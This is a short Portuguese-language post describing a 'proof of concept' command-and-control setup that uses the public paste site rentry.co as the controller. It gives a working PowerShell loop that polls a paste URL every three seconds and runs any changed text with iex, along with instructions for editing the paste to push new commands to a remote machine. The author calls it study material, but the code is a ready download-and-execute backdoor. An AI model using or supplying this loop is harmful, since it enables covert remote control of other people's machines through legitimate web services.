A Ideia
Usar sites públicos sem fins maliciosos que hospedam pequenos pedaços de texto, como dontpad.com, etc. , para passar comandos para um powershell, também “não malicioso” gentilmente hospedado em um servidor/estação.
O Powershell
Esse código não sofreu nenhuma otimização , ofuscamento ou qualquer coisa do tipo, por se tratar apenas de uma prova de conceito para estudos.
$urlc2="https://rentry.co/XXXXX/raw" # URL personalizada. XXXXX = Identificador único
$c0=""
while(1){
$c1=(New-Object Net.WebClient).DownloadString($urlc2)
if( $c1 -ne $c0 ) {
iex $c1
$c0=$c1
}
sleep(3) # Timer, apenas para não ficar consumindo recursos o tempo todo!
}
O Site controlador
Utilizamos o https://rentry.co
Acesse o site, digite o código powershell que deseja executar no server (Ex.: Get-Process
) , clique em GO
Na tela seguinte anote o seu código de edição, você precisará para trocar os comandos: Your Edit Code
e a sua URL. Essa URL, deverá ser colocada na variável $urlc2
adicionando a string /raw
no powershell script acima.
Talk is Cheap, Show me the Execution!
Possibilidades!
Muitas. ;D
É só uma prova de conceito e como tal é usada apenas para fins de estudo e verificar as possibilidades de execução de comandos em uma máquina terceira, neste caso, “cegamente”, já que o controlador não tem o retorno do comando. Mas isso dá pra implementar facilmente. Talvez eu mostre a implementação que fiz na segunda parte ;D